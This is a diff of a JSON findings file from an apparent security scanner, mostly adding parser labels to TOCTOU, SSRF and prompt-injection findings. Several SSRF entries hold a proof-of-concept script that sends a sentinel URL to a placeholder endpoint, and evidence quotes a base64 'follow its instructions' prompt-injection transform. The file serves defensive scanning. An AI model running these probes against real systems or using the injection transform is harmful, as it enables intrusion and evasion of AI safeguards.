  "_unsigned": false,
38727
38988
  "_passThroughSigning": false,
38728
38989
  "signatureStatus": "verified",
@@ -38960,6 +39221,7 @@
38960
39221
  "unvalidated": true,
38961
39222
  "cross_language": false,
38962
39223
  "family": "dos-sync-io",
39224
+ "parser": "STRUCTURAL",
38963
39225
  "_unsigned": false,
38964
39226
  "_passThroughSigning": false,
38965
39227
  "signatureStatus": "verified",
@@ -39192,6 +39454,7 @@
39192
39454
  "unvalidated": true,
39193
39455
  "cross_language": false,
39194
39456
  "family": "prototype-pollution",
39457
+ "parser": "PROTO-POLLUTION",
39195
39458
  "_unsigned": false,
39196
39459
  "_passThroughSigning": false,
39197
39460
  "signatureStatus": "verified",
@@ -39418,6 +39681,7 @@
39418
39681
  "unvalidated": true,
39419
39682
  "cross_language": false,
39420
39683
  "family": "user-input-concatenated-into-system-prom",
39684
+ "parser": "REGEX",
39421
39685
  "_unsigned": false,
39422
39686
  "_passThroughSigning": false,
39423
39687
  "signatureStatus": "verified",
@@ -39507,7 +39771,7 @@
39507
39771
  "whyFired": {
39508
39772
  "detector": "sast/user-input-concatenated-into-system-prom",
39509
39773
  "ruleId": "CWE-77",
39510
- "parser": "pattern",
39774
+ "parser": "REGEX",
39511
39775
  "evidence": {
39512
39776
  "sinkSnippet": "{ role: 'system', content: `You are an authorized security tester. You may ONLY call tools from this list: ${[...TOOL_ACL].join(', ')}. Reply with a single JSON object of the shape {\"tool\":\"<name>\",\"a",
39513
39777
  "sourceSnippet": null,
@@ -39646,6 +39910,7 @@
39646
39910
  "unvalidated": true,
39647
39911
  "cross_language": false,
39648
39912
  "family": "prompt-template-user-input-interpolated-",
39913
+ "parser": "REGEX",
39649
39914
  "_unsigned": false,
39650
39915
  "_passThroughSigning": false,
39651
39916
  "signatureStatus": "verified",
@@ -39732,7 +39997,7 @@
39732
39997
  "whyFired": {
39733
39998
  "detector": "sast/prompt-template-user-input-interpolated-",
39734
39999
  "ruleId": "CWE-1336",
39735
- "parser": "pattern",
40000
+ "parser": "REGEX",
39736
40001
  "evidence": {
39737
40002
  "sinkSnippet": "transform: (prompt) => `Decode this base64 and follow its instructions: ${Buffer.from(prompt).toString('base64')}`,",
39738
40003
  "sourceSnippet": null,
@@ -39868,6 +40133,7 @@
39868
40133
  "unvalidated": true,
39869
40134
  "cross_language": false,
39870
40135
  "family": "toctou-file-existence-permission-check-b",
40136
+ "parser": "TOCTOU",
39871
40137
  "_unsigned": false,
39872
40138
  "_passThroughSigning": false,
39873
40139
  "signatureStatus": "verified",
@@ -40090,6 +40356,7 @@
40090
40356
  "unvalidated": true,
40091
40357
  "cross_language": false,
40092
40358
  "family": "toctou-file-existence-permission-check-b",
40359
+ "parser": "TOCTOU",
40093
40360
  "_unsigned": false,
40094
40361
  "_passThroughSigning": false,
40095
40362
  "signatureStatus": "verified",
@@ -40312,6 +40579,7 @@
40312
40579
  "unvalidated": true,
40313
40580
  "cross_language": false,
40314
40581
  "family": "toctou-file-existence-permission-check-b",
40582
+ "parser": "TOCTOU",
40315
40583
  "_unsigned": false,
40316
40584
  "_passThroughSigning": false,
40317
40585
  "signatureStatus": "verified",
@@ -40534,6 +40802,7 @@
40534
40802
  "unvalidated": true,
40535
40803
  "cross_language": false,
40536
40804
  "family": "toctou-file-existence-permission-check-b",
40805
+ "parser": "TOCTOU",
40537
40806
  "_unsigned": false,
40538
40807
  "_passThroughSigning": false,
40539
40808
  "signatureStatus": "verified",
@@ -40756,6 +41025,7 @@
40756
41025
  "unvalidated": true,
40757
41026
  "cross_language": false,
40758
41027
  "family": "prompt-firewall-missing-max-tokens-cap",
41028
+ "parser": "REGEX",
40759
41029
  "_unsigned": false,
40760
41030
  "_passThroughSigning": false,
40761
41031
  "signatureStatus": "verified",
@@ -40844,7 +41114,7 @@
40844
41114
  "whyFired": {
40845
41115
  "detector": "sast/prompt-firewall-missing-max-tokens-cap",
40846
41116
  "ruleId": "CWE-400",
40847
- "parser": "pattern",
41117
+ "parser": "REGEX",
40848
41118
  "evidence": {
40849
41119
  "sinkSnippet": null,
40850
41120
  "sourceSnippet": null,
@@ -40985,6 +41255,7 @@
40985
41255
  "unvalidated": true,
40986
41256
  "cross_language": false,
40987
41257
  "family": "llm-call-without-max-tokens-unbounded-co",
41258
+ "parser": "REGEX",
40988
41259
  "_unsigned": false,
40989
41260
  "_passThroughSigning": false,
40990
41261
  "signatureStatus": "verified",
@@ -41073,7 +41344,7 @@
41073
41344
  "whyFired": {
41074
41345
  "detector": "sast/llm-call-without-max-tokens-unbounded-co",
41075
41346
  "ruleId": "CWE-770",
41076
- "parser": "pattern",
41347
+ "parser": "REGEX",
41077
41348
  "evidence": {
41078
41349
  "sinkSnippet": "// OpenAI: client.chat.completions.create({ model: \"gpt-4o-mini\", ... })",
41079
41350
  "sourceSnippet": null,
@@ -41209,6 +41480,7 @@
41209
41480
  "unvalidated": true,
41210
41481
  "cross_language": false,
41211
41482
  "family": "llm-call-without-max-tokens-unbounded-co",
41483
+ "parser": "REGEX",
41212
41484
  "_unsigned": false,
41213
41485
  "_passThroughSigning": false,
41214
41486
  "signatureStatus": "verified",
@@ -41297,7 +41569,7 @@
41297
41569
  "whyFired": {
41298
41570
  "detector": "sast/llm-call-without-max-tokens-unbounded-co",
41299
41571
  "ruleId": "CWE-770",
41300
- "parser": "pattern",
41572
+ "parser": "REGEX",
41301
41573
  "evidence": {
41302
41574
  "sinkSnippet": "// Anthropic: anthropic.messages.create({ model: \"claude-sonnet-4-6\", ... })",
41303
41575
  "sourceSnippet": null,
@@ -41433,6 +41705,7 @@
41433
41705
  "unvalidated": true,
41434
41706
  "cross_language": false,
41435
41707
  "family": "toctou-file-existence-permission-check-b",
41708
+ "parser": "TOCTOU",
41436
41709
  "_unsigned": false,
41437
41710
  "_passThroughSigning": false,
41438
41711
  "signatureStatus": "verified",
@@ -41657,6 +41930,7 @@
41657
41930
  "unvalidated": true,
41658
41931
  "cross_language": false,
41659
41932
  "family": "toctou-file-existence-permission-check-b",
41933
+ "parser": "TOCTOU",
41660
41934
  "_unsigned": false,
41661
41935
  "_passThroughSigning": false,
41662
41936
  "signatureStatus": "verified",
@@ -41879,6 +42153,7 @@
41879
42153
  "unvalidated": true,
41880
42154
  "cross_language": false,
41881
42155
  "family": "toctou-file-existence-permission-check-b",
42156
+ "parser": "TOCTOU",
41882
42157
  "_unsigned": false,
41883
42158
  "_passThroughSigning": false,
41884
42159
  "signatureStatus": "verified",
@@ -42103,6 +42378,7 @@
42103
42378
  "unvalidated": true,
42104
42379
  "cross_language": false,
42105
42380
  "family": "toctou-file-existence-permission-check-b",
42381
+ "parser": "TOCTOU",
42106
42382
  "_unsigned": false,
42107
42383
  "_passThroughSigning": false,
42108
42384
  "signatureStatus": "verified",
@@ -42327,6 +42603,7 @@
42327
42603
  "unvalidated": true,
42328
42604
  "cross_language": false,
42329
42605
  "family": "toctou-file-existence-permission-check-b",
42606
+ "parser": "TOCTOU",
42330
42607
  "_unsigned": false,
42331
42608
  "_passThroughSigning": false,
42332
42609
  "signatureStatus": "verified",
@@ -42549,15 +42826,16 @@
42549
42826
  "unvalidated": true,
42550
42827
  "cross_language": false,
42551
42828
  "family": "ssrf",
42829
+ "parser": "SSRF-METADATA",
42552
42830
  "_unsigned": false,
42553
42831
  "_passThroughSigning": false,
42554
42832
  "signatureStatus": "verified",
42555
42833
  "regression_test": {
42556
42834
  "lang": "node",
42557
- "framework": "jest",
42558
- "filename": "security_56f94fc76b59bd2b.test.mjs",
42559
- "runHint": "npx jest",
42560
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\n const METHOD = \"POST\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
42835
+ "framework": null,
42836
+ "filename": null,
42837
+ "runHint": null,
42838
+ "code": null
42561
42839
  },
42562
42840
  "poc": {
42563
42841
  "lang": "node",
@@ -42565,7 +42843,10 @@
42565
42843
  "cwe": "CWE-918",
42566
42844
  "family": "ssrf",
42567
42845
  "runHint": "node poc.mjs",
42568
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
42846
+ "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n",
42847
+ "paramKey": null,
42848
+ "paramKeyConfidence": "low",
42849
+ "paramKeyInferred": false
42569
42850
  },
42570
42851
  "calibrated_confidence": null,
42571
42852
  "calibrated_confidence_ci": null,
@@ -42794,6 +43075,7 @@
42794
43075
  "unvalidated": true,
42795
43076
  "cross_language": false,
42796
43077
  "family": "toctou-file-existence-permission-check-b",
43078
+ "parser": "TOCTOU",
42797
43079
  "_unsigned": false,
42798
43080
  "_passThroughSigning": false,
42799
43081
  "signatureStatus": "verified",
@@ -43016,6 +43298,7 @@
43016
43298
  "unvalidated": true,
43017
43299
  "cross_language": false,
43018
43300
  "family": "toctou-file-existence-permission-check-b",
43301
+ "parser": "TOCTOU",
43019
43302
  "_unsigned": false,
43020
43303
  "_passThroughSigning": false,
43021
43304
  "signatureStatus": "verified",
@@ -43238,6 +43521,7 @@
43238
43521
  "unvalidated": true,
43239
43522
  "cross_language": false,
43240
43523
  "family": "toctou-file-existence-permission-check-b",
43524
+ "parser": "TOCTOU",
43241
43525
  "_unsigned": false,
43242
43526
  "_passThroughSigning": false,
43243
43527
  "signatureStatus": "verified",
@@ -43460,6 +43744,7 @@
43460
43744
  "unvalidated": true,
43461
43745
  "cross_language": false,
43462
43746
  "family": "toctou-file-existence-permission-check-b",
43747
+ "parser": "TOCTOU",
43463
43748
  "_unsigned": false,
43464
43749
  "_passThroughSigning": false,
43465
43750
  "signatureStatus": "verified",
@@ -43684,6 +43969,7 @@
43684
43969
  "unvalidated": true,
43685
43970
  "cross_language": false,
43686
43971
  "family": "toctou-file-existence-permission-check-b",
43972
+ "parser": "TOCTOU",
43687
43973
  "_unsigned": false,
43688
43974
  "_passThroughSigning": false,
43689
43975
  "signatureStatus": "verified",
@@ -43906,6 +44192,7 @@
43906
44192
  "unvalidated": true,
43907
44193
  "cross_language": false,
43908
44194
  "family": "toctou-file-existence-permission-check-b",
44195
+ "parser": "TOCTOU",
43909
44196
  "_unsigned": false,
43910
44197
  "_passThroughSigning": false,
43911
44198
  "signatureStatus": "verified",
@@ -44128,6 +44415,7 @@
44128
44415
  "unvalidated": true,
44129
44416
  "cross_language": false,
44130
44417
  "family": "toctou-file-existence-permission-check-b",
44418
+ "parser": "TOCTOU",
44131
44419
  "_unsigned": false,
44132
44420
  "_passThroughSigning": false,
44133
44421
  "signatureStatus": "verified",
@@ -44352,15 +44640,16 @@
44352
44640
  "unvalidated": true,
44353
44641
  "cross_language": false,
44354
44642
  "family": "ssrf",
44643
+ "parser": "SSRF-METADATA",
44355
44644
  "_unsigned": false,
44356
44645
  "_passThroughSigning": false,
44357
44646
  "signatureStatus": "verified",
44358
44647
  "regression_test": {
44359
44648
  "lang": "node",
44360
- "framework": "jest",
44361
- "filename": "security_6a315fddf4a2fb12.test.mjs",
44362
- "runHint": "npx jest",
44363
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\n const METHOD = \"POST\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
44649
+ "framework": null,
44650
+ "filename": null,
44651
+ "runHint": null,
44652
+ "code": null
44364
44653
  },
44365
44654
  "poc": {
44366
44655
  "lang": "node",
@@ -44368,7 +44657,10 @@
44368
44657
  "cwe": "CWE-918",
44369
44658
  "family": "ssrf",
44370
44659
  "runHint": "node poc.mjs",
44371
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
44660
+ "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n",
44661
+ "paramKey": null,
44662
+ "paramKeyConfidence": "low",
44663
+ "paramKeyInferred": false
44372
44664
  },
44373
44665
  "calibrated_confidence": null,
44374
44666
  "calibrated_confidence_ci": null,
@@ -44597,6 +44889,7 @@
44597
44889
  "unvalidated": true,
44598
44890
  "cross_language": false,
44599
44891
  "family": "toctou-file-existence-permission-check-b",
44892
+ "parser": "TOCTOU",
44600
44893
  "_unsigned": false,
44601
44894
  "_passThroughSigning": false,
44602
44895
  "signatureStatus": "verified",
@@ -44819,6 +45112,7 @@
44819
45112
  "unvalidated": true,
44820
45113
  "cross_language": false,
44821
45114
  "family": "toctou-file-existence-permission-check-b",
45115
+ "parser": "TOCTOU",
44822
45116
  "_unsigned": false,
44823
45117
  "_passThroughSigning": false,
44824
45118
  "signatureStatus": "verified",
@@ -45043,6 +45337,7 @@
45043
45337
  "unvalidated": true,
45044
45338
  "cross_language": false,
45045
45339
  "family": "toctou-file-existence-permission-check-b",
45340
+ "parser": "TOCTOU",
45046
45341
  "_unsigned": false,
45047
45342
  "_passThroughSigning": false,
45048
45343
  "signatureStatus": "verified",
@@ -45265,6 +45560,7 @@
45265
45560
  "unvalidated": true,
45266
45561
  "cross_language": false,
45267
45562
  "family": "toctou-file-existence-permission-check-b",
45563
+ "parser": "TOCTOU",
45268
45564
  "_unsigned": false,
45269
45565
  "_passThroughSigning": false,
45270
45566
  "signatureStatus": "verified",
@@ -45489,6 +45785,7 @@
45489
45785
  "unvalidated": true,
45490
45786
  "cross_language": false,
45491
45787
  "family": "toctou-file-existence-permission-check-b",
45788
+ "parser": "TOCTOU",
45492
45789
  "_unsigned": false,
45493
45790
  "_passThroughSigning": false,
45494
45791
  "signatureStatus": "verified",
@@ -45713,6 +46010,7 @@
45713
46010
  "unvalidated": true,
45714
46011
  "cross_language": false,
45715
46012
  "family": "toctou-file-existence-permission-check-b",
46013
+ "parser": "TOCTOU",
45716
46014
  "_unsigned": false,
45717
46015
  "_passThroughSigning": false,
45718
46016
  "signatureStatus": "verified",
@@ -45935,6 +46233,7 @@
45935
46233
  "unvalidated": true,
45936
46234
  "cross_language": false,
45937
46235
  "family": "toctou-file-existence-permission-check-b",
46236
+ "parser": "TOCTOU",
45938
46237
  "_unsigned": false,
45939
46238
  "_passThroughSigning": false,
45940
46239
  "signatureStatus": "verified",
@@ -46157,6 +46456,7 @@
46157
46456
  "unvalidated": true,
46158
46457
  "cross_language": false,
46159
46458
  "family": "toctou-file-existence-permission-check-b",
46459
+ "parser": "TOCTOU",
46160
46460
  "_unsigned": false,
46161
46461
  "_passThroughSigning": false,
46162
46462
  "signatureStatus": "verified",
@@ -46381,6 +46681,7 @@
46381
46681
  "unvalidated": true,
46382
46682
  "cross_language": false,
46383
46683
  "family": "toctou-file-existence-permission-check-b",
46684
+ "parser": "TOCTOU",
46384
46685
  "_unsigned": false,
46385
46686
  "_passThroughSigning": false,
46386
46687
  "signatureStatus": "verified",
@@ -46605,6 +46906,7 @@
46605
46906
  "unvalidated": true,
46606
46907
  "cross_language": false,
46607
46908
  "family": "toctou-file-existence-permission-check-b",
46909
+ "parser": "TOCTOU",
46608
46910
  "_unsigned": false,
46609
46911
  "_passThroughSigning": false,
46610
46912
  "signatureStatus": "verified",
@@ -46827,6 +47129,7 @@
46827
47129
  "unvalidated": true,
46828
47130
  "cross_language": false,
46829
47131
  "family": "toctou-file-existence-permission-check-b",
47132
+ "parser": "TOCTOU",
46830
47133
  "_unsigned": false,
46831
47134
  "_passThroughSigning": false,
46832
47135
  "signatureStatus": "verified",
@@ -47049,6 +47352,7 @@
47049
47352
  "unvalidated": true,
47050
47353
  "cross_language": false,
47051
47354
  "family": "toctou-file-existence-permission-check-b",
47355
+ "parser": "TOCTOU",
47052
47356
  "_unsigned": false,
47053
47357
  "_passThroughSigning": false,
47054
47358
  "signatureStatus": "verified",
@@ -47271,6 +47575,7 @@
47271
47575
  "unvalidated": true,
47272
47576
  "cross_language": false,
47273
47577
  "family": "toctou-file-existence-permission-check-b",
47578
+ "parser": "TOCTOU",
47274
47579
  "_unsigned": false,
47275
47580
  "_passThroughSigning": false,
47276
47581
  "signatureStatus": "verified",
@@ -47495,6 +47800,7 @@
47495
47800
  "unvalidated": true,
47496
47801
  "cross_language": false,
47497
47802
  "family": "toctou-file-existence-permission-check-b",
47803
+ "parser": "TOCTOU",
47498
47804
  "_unsigned": false,
47499
47805
  "_passThroughSigning": false,
47500
47806
  "signatureStatus": "verified",
@@ -47719,6 +48025,7 @@
47719
48025
  "unvalidated": true,
47720
48026
  "cross_language": false,
47721
48027
  "family": "toctou-file-existence-permission-check-b",
48028
+ "parser": "TOCTOU",
47722
48029
  "_unsigned": false,
47723
48030
  "_passThroughSigning": false,
47724
48031
  "signatureStatus": "verified",
@@ -47943,6 +48250,7 @@
47943
48250
  "unvalidated": true,
47944
48251
  "cross_language": false,
47945
48252
  "family": "toctou-file-existence-permission-check-b",
48253
+ "parser": "TOCTOU",
47946
48254
  "_unsigned": false,
47947
48255
  "_passThroughSigning": false,
47948
48256
  "signatureStatus": "verified",
@@ -48167,6 +48475,7 @@
48167
48475
  "unvalidated": true,
48168
48476
  "cross_language": false,
48169
48477
  "family": "toctou-file-existence-permission-check-b",
48478
+ "parser": "TOCTOU",
48170
48479
  "_unsigned": false,
48171
48480
  "_passThroughSigning": false,
48172
48481
  "signatureStatus": "verified",
@@ -48391,6 +48700,7 @@
48391
48700
  "unvalidated": true,
48392
48701
  "cross_language": false,
48393
48702
  "family": "toctou-file-existence-permission-check-b",
48703
+ "parser": "TOCTOU",
48394
48704
  "_unsigned": false,
48395
48705
  "_passThroughSigning": false,
48396
48706
  "signatureStatus": "verified",
@@ -48613,6 +48923,7 @@
48613
48923
  "unvalidated": true,
48614
48924
  "cross_language": false,
48615
48925
  "family": "toctou-file-existence-permission-check-b",
48926
+ "parser": "TOCTOU",
48616
48927
  "_unsigned": false,
48617
48928
  "_passThroughSigning": false,
48618
48929
  "signatureStatus": "verified",
@@ -48835,6 +49146,7 @@
48835
49146
  "unvalidated": true,
48836
49147
  "cross_language": false,
48837
49148
  "family": "toctou-file-existence-permission-check-b",
49149
+ "parser": "TOCTOU",
48838
49150
  "_unsigned": false,
48839
49151
  "_passThroughSigning": false,
48840
49152
  "signatureStatus": "verified",
@@ -49057,6 +49369,7 @@
49057
49369
  "unvalidated": true,
49058
49370
  "cross_language": false,
49059
49371
  "family": "toctou-file-existence-permission-check-b",
49372
+ "parser": "TOCTOU",
49060
49373
  "_unsigned": false,
49061
49374
  "_passThroughSigning": false,
49062
49375
  "signatureStatus": "verified",
@@ -49281,6 +49594,7 @@
49281
49594
  "unvalidated": true,
49282
49595
  "cross_language": false,
49283
49596
  "family": "toctou-file-existence-permission-check-b",
49597
+ "parser": "TOCTOU",
49284
49598
  "_unsigned": false,
49285
49599
  "_passThroughSigning": false,
49286
49600
  "signatureStatus": "verified",
@@ -49503,6 +49817,7 @@
49503
49817
  "unvalidated": true,
49504
49818
  "cross_language": false,
49505
49819
  "family": "toctou-file-existence-permission-check-b",
49820
+ "parser": "TOCTOU",
49506
49821
  "_unsigned": false,
49507
49822
  "_passThroughSigning": false,
49508
49823
  "signatureStatus": "verified",
@@ -49725,6 +50040,7 @@
49725
50040
  "unvalidated": true,
49726
50041
  "cross_language": false,
49727
50042
  "family": "toctou-file-existence-permission-check-b",
50043
+ "parser": "TOCTOU",
49728
50044
  "_unsigned": false,
49729
50045
  "_passThroughSigning": false,
49730
50046
  "signatureStatus": "verified",
@@ -49947,15 +50263,16 @@
49947
50263
  "unvalidated": true,
49948
50264
  "cross_language": false,
49949
50265
  "family": "ssrf",
50266
+ "parser": "SSRF-METADATA",
49950
50267
  "_unsigned": false,
49951
50268
  "_passThroughSigning": false,
49952
50269
  "signatureStatus": "verified",
49953
50270
  "regression_test": {
49954
50271
  "lang": "node",
49955
- "framework": "jest",
49956
- "filename": "security_76922713e8b5ce41.test.mjs",
49957
- "runHint": "npx jest",
49958
- "code": "// Regression test for SSRF: explicit reference to cloud instance-metadata endpoint (CWE-918).\n// Auto-generated from P1.1 PoC; fails on vulnerable code, passes after the fix.\n\nimport { test, expect } from '@jest/globals';\n\ntest('SSRF: explicit reference to cloud instance-metadata endpoint', async () => {\n const URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\n const METHOD = \"POST\";\n const PAYLOAD = \"http://127.0.0.1:65533/poc-ssrf-sentinel\";\n const body = METHOD === 'GET' ? null : JSON.stringify({ input: PAYLOAD });\n const reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + 'input=' + encodeURIComponent(PAYLOAD)\n : URL_;\n const r = await fetch(reqUrl, { method: METHOD, headers: { 'Content-Type': 'application/json' }, body });\n const text = await r.text();\n // The assertion below is the \"exploit demonstrated\" signal — when this\n // test PASSES, the vuln is still present. After the fix, this assertion\n // SHOULD fail. Inverse the assertion in a green build.\n const demonstrated = text.includes('PoC') || /syntax error/i.test(text) || text.includes('<script>');\n expect(demonstrated).toBe(false);\n});\n"
50272
+ "framework": null,
50273
+ "filename": null,
50274
+ "runHint": null,
50275
+ "code": null
49959
50276
  },
49960
50277
  "poc": {
49961
50278
  "lang": "node",
@@ -49963,7 +50280,10 @@
49963
50280
  "cwe": "CWE-918",
49964
50281
  "family": "ssrf",
49965
50282
  "runHint": "node poc.mjs",
49966
- "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n"
50283
